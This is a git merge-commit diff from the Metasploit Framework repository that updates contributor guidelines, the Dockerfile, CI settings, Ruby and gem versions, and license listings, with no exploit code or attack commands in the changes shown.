Merge remote-tracking branch 'upstream/master' into land-10812-
commit
5fc7167beb
|
@ -5,6 +5,8 @@ docker-compose*.yml
|
|||
docker/
|
||||
!docker/msfconsole.rc
|
||||
!docker/entrypoint.sh
|
||||
!docker/database.yml
|
||||
Dockerfile
|
||||
README.md
|
||||
.git/
|
||||
.github/
|
||||
|
|
|
@ -2,6 +2,8 @@
|
|||
Tell us what this change does. If you're fixing a bug, please mention
|
||||
the github issue number.
|
||||
|
||||
Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
|
||||
|
||||
## Verification
|
||||
|
||||
List the steps needed to make sure this thing works
|
||||
|
|
1
.mailmap
1
.mailmap
|
@ -64,7 +64,6 @@ wwebb-r7 <wwebb-r7@github> <William_Webb@rapid7.com>
|
|||
|
||||
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
|
||||
bcoles <bcoles@github> bcoles <bcoles@gmail.com>
|
||||
bcoles <bcoles@github> Brendan Coles <bcoles@gmail.com>
|
||||
bokojan <bokojan@github> parzamendi-r7 <peter_arzamendi@rapid7.com>
|
||||
brandonprry <brandonprry@github> <bperry@brandons-mbp.attlocal.net>
|
||||
brandonprry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
|
||||
|
|
|
@ -1 +1 @@
|
|||
2.5.1
|
||||
2.5.3
|
||||
|
|
12
.travis.yml
12
.travis.yml
|
@ -11,22 +11,23 @@ addons:
|
|||
- graphviz
|
||||
language: ruby
|
||||
rvm:
|
||||
- '2.3.7'
|
||||
- '2.4.4'
|
||||
- '2.5.1'
|
||||
- '2.3.8'
|
||||
- '2.4.5'
|
||||
- '2.5.3'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
|
||||
# Used for testing the remote data service
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
|
||||
|
||||
matrix:
|
||||
fast_finish: true
|
||||
exclude:
|
||||
- rvm: '2.3.7'
|
||||
- rvm: '2.3.8'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
- rvm: '2.4.4'
|
||||
- rvm: '2.4.5'
|
||||
env: CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
|
||||
|
||||
jobs:
|
||||
|
@ -48,6 +49,7 @@ before_install:
|
|||
- ls -la ./.git/hooks
|
||||
- ./.git/hooks/post-merge
|
||||
# Update the bundler
|
||||
- gem update --system
|
||||
- gem install bundler
|
||||
before_script:
|
||||
- cp config/database.yml.travis config/database.yml
|
||||
|
|
|
@ -37,7 +37,7 @@ when an individual is representing the project or its community.
|
|||
Instances of abusive, harassing, or otherwise unacceptable behavior may be
|
||||
reported by contacting the project maintainers at msfdev@metasploit.com. If
|
||||
the incident involves a committer, you may report directly to
|
||||
egypt@metasploit.com or todb@metasploit.com.
|
||||
caitlin_condon@rapid7.com or todb@metasploit.com.
|
||||
|
||||
All complaints will be reviewed and investigated and will result in a
|
||||
response that is deemed necessary and appropriate to the circumstances.
|
||||
|
|
114
CONTRIBUTING.md
114
CONTRIBUTING.md
|
@ -1,82 +1,54 @@
|
|||
# Hello, World!
|
||||
|
||||
Thanks for your interest in making Metasploit -- and therefore, the
|
||||
world -- a better place!
|
||||
|
||||
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
|
||||
Please try to be as specific as you can about your problem; include steps
|
||||
to reproduce (cut and paste from your console output if it's helpful) and
|
||||
what you were expecting to happen.
|
||||
|
||||
Are you about to report a security vulnerability in Metasploit itself?
|
||||
How ironic! Please take a look at Rapid7's [Vulnerability
|
||||
Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
|
||||
your report to security@rapid7.com using our [PGP key].
|
||||
|
||||
Are you about to contribute some new functionality, a bug fix, or a new
|
||||
Metasploit module? If so, read on...
|
||||
world -- a better place! Before you get started, review our
|
||||
[Code of Conduct]. There are mutliple ways to help beyond just writing code:
|
||||
- [Submit bugs and feature requests] with detailed information about your issue or idea.
|
||||
- [Help fellow users with open issues] or [help fellow committers test recent pull requests].
|
||||
- [Report a security vulnerability in Metasploit itself] to Rapid7.
|
||||
- Submit an updated or brand new module! We are always eager for exploits, scanners, and new
|
||||
integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
|
||||
|
||||
# Contributing to Metasploit
|
||||
|
||||
What you see here in CONTRIBUTING.md is a bullet point list of the do's
|
||||
and don'ts of how to make sure *your* valuable contributions actually
|
||||
make it into Metasploit's master branch.
|
||||
|
||||
If you care not to follow these rules, your contribution **will** be
|
||||
closed. Sorry!
|
||||
|
||||
This is intended to be a **short** list. The [wiki] is much more
|
||||
exhaustive and reveals many mysteries. If you read nothing else, take a
|
||||
look at the standard [development environment setup] guide
|
||||
and Metasploit's [Common Coding Mistakes].
|
||||
Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
|
||||
it into Metasploit's master branch. If you do not care to follow these rules, your contribution
|
||||
**will** be closed. Sorry!
|
||||
|
||||
## Code Contributions
|
||||
|
||||
* **Do** stick to the [Ruby style guide].
|
||||
* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
|
||||
* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
|
||||
* **Do** follow the [50/72 rule] for Git commit messages.
|
||||
* **Don't** use the default merge messages when merging from other branches.
|
||||
* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master`.
|
||||
If you do not send a PR from a topic branch, the history of your PR will be
|
||||
lost as soon as you update your own master branch. See
|
||||
https://github.com/rapid7/metasploit-framework/pull/8000 for an example of
|
||||
this in action.
|
||||
|
||||
* **Do** create a [topic branch] to work on instead of working directly on `master` to preserve the
|
||||
history of your pull request. See [PR#8000] for an example of losing commit history as soon as
|
||||
you update your own master branch.
|
||||
|
||||
### Pull Requests
|
||||
|
||||
* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
|
||||
* **Do** target your pull request to the **master branch**.
|
||||
* **Do** specify a descriptive title to make searching for your pull request easier.
|
||||
* **Do** include [console output], especially for witnessable effects in `msfconsole`.
|
||||
* **Do** list [verification steps] so your code is testable.
|
||||
* **Do** [reference associated issues] in your pull request description.
|
||||
* **Do** write [release notes] once a pull request is landed.
|
||||
* **Don't** leave your pull request description blank.
|
||||
* **Don't** abandon your pull request. Being responsive helps us land your code faster.
|
||||
|
||||
Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
||||
Pull request [PR#9966] is a good example to follow.
|
||||
|
||||
#### New Modules
|
||||
|
||||
* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
|
||||
- It would be even better to set up `msftidy.rb` as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
|
||||
* **Do** use the many module mixin [API]s.
|
||||
* **Don't** include more than one module per pull request.
|
||||
* **Do** include instructions on how to setup the vulnerable environment or software.
|
||||
* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs.
|
||||
|
||||
|
||||
|
||||
#### Scripts
|
||||
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for
|
||||
automating local tasks, and anything "serious" can be done with post
|
||||
modules and local exploits.
|
||||
* **Do** include [Module Documentation] showing sample run-throughs.
|
||||
* **Don't** submit new [scripts]. Scripts are shipped as examples for automating local tasks, and
|
||||
anything "serious" can be done with post modules and local exploits.
|
||||
|
||||
#### Library Code
|
||||
|
||||
* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
|
||||
* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
|
||||
* **Do** follow [Better Specs] - it's like the style guide for specs.
|
||||
* **Do** write [YARD] documentation - this makes it easier for people to use your code.
|
||||
* **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
|
||||
|
@ -84,44 +56,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
|
|||
#### Bug Fixes
|
||||
|
||||
* **Do** include reproduction steps in the form of verification steps.
|
||||
* **Do** include a link to any corresponding [Issues] in the format of
|
||||
`See #1234` in your commit description.
|
||||
* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
|
||||
|
||||
## Bug Reports
|
||||
|
||||
* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
|
||||
Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security).
|
||||
|
||||
When reporting Metasploit issues:
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
|
||||
* **Don't** file duplicate reports; search for your bug before filing a new report.
|
||||
|
||||
If you need some more guidance, talk to the main body of open
|
||||
source contributors over on the [Freenode IRC channel],
|
||||
or e-mail us at the [metasploit-hackers] mailing list.
|
||||
If you need some more guidance, talk to the main body of open source contributors over on our
|
||||
[Metasploit Slack] or [#metasploit on Freenode IRC].
|
||||
|
||||
Also, **thank you** for taking the few moments to read this far! You're
|
||||
already way ahead of the curve, so keep it up!
|
||||
Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
|
||||
curve, so keep it up!
|
||||
|
||||
[Issue Tracker]:http://r-7.co/MSF-BUGv1
|
||||
[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
|
||||
[wiki]:https://github.com/rapid7/metasploit-framework/wiki
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[development environment setup]:http://r-7.co/MSF-DEV
|
||||
[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
|
||||
[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
|
||||
[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
|
||||
[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
|
||||
[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
|
||||
[development environment]:http://r-7.co/MSF-DEV
|
||||
[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
|
||||
[Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
|
||||
[Rubocop]:https://rubygems.org/search?query=rubocop
|
||||
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
|
||||
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
|
||||
[PR#8000]:https://github.com/rapid7/metasploit-framework/pull/8000
|
||||
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
|
||||
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
|
||||
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
|
||||
[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
|
||||
[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
|
||||
[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
|
||||
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
|
||||
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
|
||||
[API]:https://rapid7.github.io/metasploit-framework/api
|
||||
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
|
||||
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
|
||||
[RSpec]:http://rspec.info
|
||||
[Better Specs]:http://betterspecs.org
|
||||
[YARD]:http://yardoc.org
|
||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||
[Metasploit Slack]:https://www.metasploit.com/slack
|
||||
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||
|
|
25
Dockerfile
25
Dockerfile
|
@ -1,12 +1,12 @@
|
|||
FROM ruby:2.5.1-alpine3.7 AS builder
|
||||
FROM ruby:2.5.3-alpine3.7 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV BUNDLE_IGNORE_MESSAGES="true"
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME
|
||||
COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
|
||||
COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
|
||||
COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
|
||||
COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
|
||||
|
@ -37,26 +37,31 @@ RUN apk add --no-cache \
|
|||
&& chmod -R a+r /usr/local/bundle
|
||||
|
||||
|
||||
FROM ruby:2.5.1-alpine3.7
|
||||
FROM ruby:2.5.3-alpine3.7
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ENV APP_HOME /usr/src/metasploit-framework/
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV NMAP_PRIVILEGED=""
|
||||
ENV METASPLOIT_GROUP=metasploit
|
||||
|
||||
COPY --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY . $APP_HOME
|
||||
# used for the copy command
|
||||
RUN addgroup -S $METASPLOIT_GROUP
|
||||
|
||||
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
|
||||
|
||||
COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
|
||||
COPY --chown=root:metasploit . $APP_HOME/
|
||||
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
|
||||
|
||||
WORKDIR $APP_HOME
|
||||
|
||||
# we need this entrypoint to dynamically create a user
|
||||
# matching the hosts UID and GID so we can mount something
|
||||
# from the users home directory. If the IDs don't match
|
||||
# it results in access denied errors. Once docker has
|
||||
# a solution for this we can revert it back to normal
|
||||
# it results in access denied errors.
|
||||
ENTRYPOINT ["docker/entrypoint.sh"]
|
||||
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]
|
||||
CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
|
||||
|
|
2
Gemfile
2
Gemfile
|
@ -3,6 +3,8 @@ source 'https://rubygems.org'
|
|||
# spec.add_runtime_dependency '<name>', [<version requirements>]
|
||||
gemspec name: 'metasploit-framework'
|
||||
|
||||
gem 'sqlite3', '~>1.3.0'
|
||||
|
||||
# separate from test as simplecov is not run on travis-ci
|
||||
group :coverage do
|
||||
# code coverage for tests
|
||||
|
|
123
Gemfile.lock
123
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (5.0.0)
|
||||
metasploit-framework (5.0.5)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -9,8 +9,10 @@ PATH
|
|||
bcrypt
|
||||
bcrypt_pbkdf
|
||||
bit-struct
|
||||
concurrent-ruby (= 1.0.5)
|
||||
dnsruby
|
||||
ed25519
|
||||
em-http-request
|
||||
faker
|
||||
filesize
|
||||
jsobfu
|
||||
|
@ -19,9 +21,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.52)
|
||||
metasploit-payloads (= 1.3.61)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.4.2)
|
||||
metasploit_payloads-mettle (= 0.5.6)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -66,7 +68,6 @@ PATH
|
|||
sinatra
|
||||
sqlite3
|
||||
sshkey
|
||||
sysrandom
|
||||
thin
|
||||
tzinfo
|
||||
tzinfo-data
|
||||
|
@ -79,27 +80,27 @@ GEM
|
|||
remote: https://rubygems.org/
|
||||
specs:
|
||||
Ascii85 (1.0.3)
|
||||
actionpack (4.2.10)
|
||||
actionview (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionpack (4.2.11)
|
||||
actionview (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rack (~> 1.6)
|
||||
rack-test (~> 0.6.2)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||
actionview (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
actionview (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
erubis (~> 2.7.0)
|
||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||
activemodel (4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activemodel (4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
builder (~> 3.1)
|
||||
activerecord (4.2.10)
|
||||
activemodel (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
activerecord (4.2.11)
|
||||
activemodel (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
arel (~> 6.0)
|
||||
activesupport (4.2.10)
|
||||
activesupport (4.2.11)
|
||||
i18n (~> 0.7)
|
||||
minitest (~> 5.1)
|
||||
thread_safe (~> 0.3, >= 0.3.4)
|
||||
|
@ -118,33 +119,43 @@ GEM
|
|||
builder (3.2.3)
|
||||
coderay (1.1.2)
|
||||
concurrent-ruby (1.0.5)
|
||||
cookiejar (0.3.3)
|
||||
crass (1.0.4)
|
||||
daemons (1.2.6)
|
||||
daemons (1.3.1)
|
||||
diff-lcs (1.3)
|
||||
dnsruby (1.61.2)
|
||||
addressable (~> 2.5)
|
||||
docile (1.3.1)
|
||||
ed25519 (1.2.4)
|
||||
em-http-request (1.1.5)
|
||||
addressable (>= 2.3.4)
|
||||
cookiejar (!= 0.3.1)
|
||||
em-socksify (>= 0.3)
|
||||
eventmachine (>= 1.0.3)
|
||||
http_parser.rb (>= 0.6.0)
|
||||
em-socksify (0.3.2)
|
||||
eventmachine (>= 1.0.0.beta.4)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.7)
|
||||
factory_bot (4.11.1)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.11.1)
|
||||
factory_bot (~> 4.11.1)
|
||||
railties (>= 3.0.0)
|
||||
factory_bot (5.0.0)
|
||||
activesupport (>= 4.2.0)
|
||||
factory_bot_rails (5.0.0)
|
||||
factory_bot (~> 5.0.0)
|
||||
railties (>= 4.2.0)
|
||||
faker (1.9.1)
|
||||
i18n (>= 0.7)
|
||||
faraday (0.15.3)
|
||||
faraday (0.15.4)
|
||||
multipart-post (>= 1.2, < 3)
|
||||
filesize (0.2.0)
|
||||
fivemat (1.3.7)
|
||||
hashery (2.1.2)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jsobfu (0.4.2)
|
||||
rkelly-remix
|
||||
json (2.1.0)
|
||||
loofah (2.2.2)
|
||||
loofah (2.2.3)
|
||||
crass (~> 1.0.2)
|
||||
nokogiri (>= 1.5.9)
|
||||
metasm (1.0.3)
|
||||
|
@ -152,12 +163,12 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-credential (3.0.1)
|
||||
metasploit-credential (3.0.3)
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
metasploit_data_models (>= 3.0.0)
|
||||
net-ssh
|
||||
pg (~> 0.15)
|
||||
pg
|
||||
railties
|
||||
rex-socket
|
||||
rubyntlm
|
||||
|
@ -166,39 +177,39 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.52)
|
||||
metasploit_data_models (3.0.1)
|
||||
metasploit-payloads (1.3.61)
|
||||
metasploit_data_models (3.0.5)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
arel-helpers
|
||||
metasploit-concern
|
||||
metasploit-model
|
||||
pg (= 0.20.0)
|
||||
pg
|
||||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.4.2)
|
||||
method_source (0.9.0)
|
||||
mini_portile2 (2.3.0)
|
||||
metasploit_payloads-mettle (0.5.6)
|
||||
method_source (0.9.2)
|
||||
mini_portile2 (2.4.0)
|
||||
minitest (5.11.3)
|
||||
mqtt (0.5.0)
|
||||
msgpack (1.2.4)
|
||||
msgpack (1.2.6)
|
||||
multipart-post (2.0.0)
|
||||
nessus_rest (0.1.6)
|
||||
net-ssh (5.0.2)
|
||||
net-ssh (5.1.0)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.2.1)
|
||||
nokogiri (1.8.4)
|
||||
mini_portile2 (~> 2.3.0)
|
||||
octokit (4.12.0)
|
||||
nokogiri (1.10.1)
|
||||
mini_portile2 (~> 2.4.0)
|
||||
octokit (4.13.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
openssl-ccm (1.2.2)
|
||||
openvas-omp (0.0.4)
|
||||
packetfu (1.1.13)
|
||||
pcaprub
|
||||
patch_finder (1.0.2)
|
||||
pcaprub (0.13.0)
|
||||
pdf-reader (2.1.0)
|
||||
pdf-reader (2.2.0)
|
||||
Ascii85 (~> 1.0.0)
|
||||
afm (~> 0.2.1)
|
||||
hashery (~> 2.0)
|
||||
|
@ -210,11 +221,11 @@ GEM
|
|||
activerecord (~> 4.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.11.3)
|
||||
pry (0.12.2)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.9.0)
|
||||
public_suffix (3.0.3)
|
||||
rack (1.6.10)
|
||||
rack (1.6.11)
|
||||
rack-protection (1.5.5)
|
||||
rack
|
||||
rack-test (0.6.3)
|
||||
|
@ -227,19 +238,19 @@ GEM
|
|||
rails-deprecated_sanitizer (>= 1.0.1)
|
||||
rails-html-sanitizer (1.0.4)
|
||||
loofah (~> 2.2, >= 2.2.2)
|
||||
railties (4.2.10)
|
||||
actionpack (= 4.2.10)
|
||||
activesupport (= 4.2.10)
|
||||
railties (4.2.11)
|
||||
actionpack (= 4.2.11)
|
||||
activesupport (= 4.2.11)
|
||||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (12.3.1)
|
||||
rake (12.3.2)
|
||||
rb-readline (0.5.5)
|
||||
recog (2.1.24)
|
||||
recog (2.1.45)
|
||||
nokogiri
|
||||
redcarpet (3.4.0)
|
||||
rex-arch (0.1.13)
|
||||
rex-text
|
||||
rex-bin_tools (0.1.4)
|
||||
rex-bin_tools (0.1.6)
|
||||
metasm
|
||||
rex-arch
|
||||
rex-core
|
||||
|
@ -250,7 +261,7 @@ GEM
|
|||
metasm
|
||||
rex-arch
|
||||
rex-text
|
||||
rex-exploitation (0.1.19)
|
||||
rex-exploitation (0.1.20)
|
||||
jsobfu
|
||||
metasm
|
||||
rex-arch
|
||||
|
@ -290,13 +301,13 @@ GEM
|
|||
rspec-mocks (~> 3.8.0)
|
||||
rspec-core (3.8.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-expectations (3.8.1)
|
||||
rspec-expectations (3.8.2)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-mocks (3.8.0)
|
||||
diff-lcs (>= 1.2.0, < 2.0)
|
||||
rspec-support (~> 3.8.0)
|
||||
rspec-rails (3.8.0)
|
||||
rspec-rails (3.8.2)
|
||||
actionpack (>= 3.0)
|
||||
activesupport (>= 3.0)
|
||||
railties (>= 3.0)
|
||||
|
@ -309,7 +320,7 @@ GEM
|
|||
rspec-support (3.8.0)
|
||||
ruby-macho (2.1.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby_smb (1.0.4)
|
||||
ruby_smb (1.0.5)
|
||||
bindata
|
||||
rubyntlm
|
||||
windows_error
|
||||
|
@ -330,19 +341,18 @@ GEM
|
|||
sqlite3 (1.3.13)
|
||||
sshkey (1.9.0)
|
||||
swagger-blocks (2.0.2)
|
||||
sysrandom (1.0.5)
|
||||
thin (1.7.2)
|
||||
daemons (~> 1.0, >= 1.0.9)
|
||||
eventmachine (~> 1.0, >= 1.0.4)
|
||||
rack (>= 1, < 3)
|
||||
thor (0.20.0)
|
||||
thor (0.20.3)
|
||||
thread_safe (0.3.6)
|
||||
tilt (2.0.8)
|
||||
tilt (2.0.9)
|
||||
timecop (0.9.1)
|
||||
ttfunk (1.5.1)
|
||||
tzinfo (1.2.5)
|
||||
thread_safe (~> 0.1)
|
||||
tzinfo-data (1.2018.5)
|
||||
tzinfo-data (1.2018.9)
|
||||
tzinfo (>= 1.0.0)
|
||||
warden (1.2.7)
|
||||
rack (>= 1.0)
|
||||
|
@ -351,7 +361,7 @@ GEM
|
|||
activemodel (>= 4.2.7)
|
||||
activesupport (>= 4.2.7)
|
||||
xmlrpc (0.3.0)
|
||||
yard (0.9.16)
|
||||
yard (0.9.18)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
@ -367,9 +377,10 @@ DEPENDENCIES
|
|||
rspec-rails
|
||||
rspec-rerun
|
||||
simplecov
|
||||
sqlite3 (~> 1.3.0)
|
||||
swagger-blocks
|
||||
timecop
|
||||
yard
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.4
|
||||
1.17.3
|
||||
|
|
6
LICENSE
6
LICENSE
|
@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
|
|||
Copyright: 2009 Vertive, Inc.
|
||||
License: MIT
|
||||
|
||||
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
|
||||
Copyright: 2006-2010 Yoann GUILLOT
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: lib/msf/core/modules/external/python/async_timeout/*
|
||||
Copyright: 2016-2017 Andrew Svetlov
|
||||
License: Apache 2.0
|
||||
|
@ -115,7 +111,7 @@ Files: data/webcam/api.js
|
|||
Copyright: Copyright 2013 Muaz Khan<@muazkh>.
|
||||
License: MIT
|
||||
|
||||
Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
|
||||
Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
|
||||
Copyright: Copyright 2018 SmartBear Software
|
||||
License: Apache 2.0
|
||||
|
||||
|
|
147
LICENSE_GEMS
147
LICENSE_GEMS
|
@ -1,135 +1,136 @@
|
|||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
Ascii85, 1.0.3, MIT
|
||||
actionpack, 4.2.10, MIT
|
||||
actionview, 4.2.10, MIT
|
||||
activemodel, 4.2.10, MIT
|
||||
activerecord, 4.2.10, MIT
|
||||
activesupport, 4.2.10, MIT
|
||||
actionpack, 4.2.11, MIT
|
||||
actionview, 4.2.11, MIT
|
||||
activemodel, 4.2.11, MIT
|
||||
activerecord, 4.2.11, MIT
|
||||
activesupport, 4.2.11, MIT
|
||||
addressable, 2.5.2, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
arel, 6.0.4, MIT
|
||||
arel-helpers, 2.6.1, MIT
|
||||
backports, 3.11.1, MIT
|
||||
bcrypt, 3.1.11, MIT
|
||||
arel-helpers, 2.8.0, MIT
|
||||
backports, 3.11.4, MIT
|
||||
bcrypt, 3.1.12, MIT
|
||||
bcrypt_pbkdf, 1.0.0, MIT
|
||||
bindata, 2.4.3, ruby
|
||||
bindata, 2.4.4, ruby
|
||||
bit-struct, 0.16, ruby
|
||||
builder, 3.2.3, MIT
|
||||
bundler, 1.16.1, MIT
|
||||
bundler, 1.17.3, MIT
|
||||
coderay, 1.1.2, MIT
|
||||
concurrent-ruby, 1.0.5, MIT
|
||||
crass, 1.0.3, MIT
|
||||
cookiejar, 0.3.3, unknown
|
||||
crass, 1.0.4, MIT
|
||||
daemons, 1.3.1, MIT
|
||||
